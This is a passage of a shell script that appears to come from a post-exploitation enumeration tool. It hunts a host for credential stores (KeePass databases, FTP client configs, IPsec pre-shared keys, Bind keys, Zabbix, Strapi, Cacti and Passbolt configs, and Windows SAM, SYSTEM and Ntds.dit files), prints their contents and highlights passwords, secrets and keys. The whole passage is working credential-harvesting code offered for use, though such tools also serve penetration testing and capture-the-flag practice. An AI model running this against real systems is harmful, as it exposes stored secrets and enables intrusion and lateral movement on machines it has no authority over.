sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Keepass Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing FTP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then echo_not_found "ftp.config"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing Racoon Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then echo_not_found "racoon.conf"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then echo_not_found "psk.txt"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Opera Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then echo_not_found "com.operasoftware.Opera"; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Safari Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then echo_not_found "Safari"; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing InfluxDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then echo_not_found "influxdb.conf"; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Zabbix Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then echo_not_found "zabbix_server.conf"; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then echo_not_found "zabbix_agentd.conf"; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then echo_not_found "zabbix"; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix$,${SED_RED},"; for ff in $(find "$f" -name "*.psk"); do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Bind Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing SeedDMS Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then echo_not_found "seeddms*"; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; for ff in $(find "$f" -name "settings.xml"); do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Ddclient Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then echo_not_found "ddclient.conf"; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Sentry Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then echo_not_found "sentry"; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; for ff in $(find "$f" -name "config.yml"); do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then echo_not_found "sentry.conf.py"; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Strapi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then echo_not_found "environments"; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; for ff in $(find "$f" -name "custom.json"); do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "database.json"); do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "request.json"); do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "response.json"); do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "security.json"); do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "server.json"); do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Cacti Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then echo_not_found "cacti"; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; for ff in $(find "$f" -name "config.php"); do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "config.php.dist"); do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "installer.php"); do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "check_all_pages"); do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Roundcube Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then echo_not_found "roundcube"; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; for ff in $(find "$f" -name "config.inc.php"); do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Passbolt Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - - - - - print_2title "Analyzing Interesting logs Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing Windows Files Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then echo_not_found "ConsoleHost_history.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then echo_not_found "FreeSSHDservice.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then echo_not_found "NetSetup.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then echo_not_found "Ntds.dit"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then echo_not_found "protecteduserkey.bin"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then echo_not_found "RDCMan.settings"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then echo_not_found "SAM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then echo_not_found "SYSTEM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then echo_not_found "SecEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then echo_not_found "appcmd.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then echo_not_found "bash.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then echo_not_found "datasources.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then echo_not_found "default.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then echo_not_found "drives.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then echo_not_found "groups.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then echo_not_found "https-xampp.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then echo_not_found "https.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then echo_not_found "iis6.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then echo_not_found "index.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then echo_not_found "my.cnf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then echo_not_found "my.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then echo_not_found "ntuser.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then echo_not_found "pagefile.sys"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then echo_not_found "printers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then echo_not_found "scclient.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then echo_not_found "scheduledtasks.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then echo_not_found "security.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then echo_not_found "server.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then echo_not_found "setupinfo"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then echo_not_found "setupinfo.bak"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then echo_not_found "sitemanager.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then echo_not_found "software"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then echo_not_found "software.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then echo_not_found "sysprep.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then echo_not_found "sysprep.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then echo_not_found "system.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then echo_not_found "unattend.txt"; fi; printf "%s" 